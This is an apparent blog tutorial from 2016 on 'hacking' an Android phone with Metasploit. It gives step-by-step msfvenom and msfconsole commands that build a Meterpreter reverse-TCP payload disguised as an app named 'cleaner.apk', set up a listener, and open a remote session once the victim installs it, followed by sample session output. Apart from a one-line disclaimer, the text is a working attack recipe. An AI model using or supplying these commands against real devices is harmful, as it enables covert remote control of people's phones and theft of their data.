How to hack an Android Device
Publish date: May 24, 2016
Note: This tutorial is for educational purposes I’m not responsible for any misuse of it.
Requirements:
- Kali Linux
- Metasploit Framework installed.
Note: This can be done on other distros with Metasploit package but Kali Linux gives favourable environment with all packages pre-installed.
Steps:
- Create an android apk file using msfvenom.
$ msfvenom -p android/meterpreter/reverse_tcp LHOST="IP ADDR" LPORT=4444 R > cleaner.apk
Note: Replace IP ADDR with your ip address.
- Fire up msfconsole
$ msfconsole
- To listen to the payload, setup a handler.
msf> use exploit/multi/handler
msf exploit(handler)> set PAYLOAD android/meterpreter/reverse_tcp
- Check its configurations.
msf exploit(handler)> show options
- Set the LHOST and LPORT you specified earlier using these commands.
msf exploit(handler)> set LHOST "IP ADDR"
msf exploit(handler)> set LPORT 4444
- Start the exploit
msf exploit(handler)> exploit
- You need to transfer the apk file we generated previously to the testing phone and install it. Once that app is opened in the phone meterpreter session will start.
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Starting the payload handler...
[*] Sending stage (63194 bytes) to 192.168.0.106
[*] Meterpreter session 1 opened (192.168.0.100:4444 ->
192.168.0.106:35897) at 2016-055-24 _05:30
meterpreter >
-
Done!
-
For options use this
meterpreter > help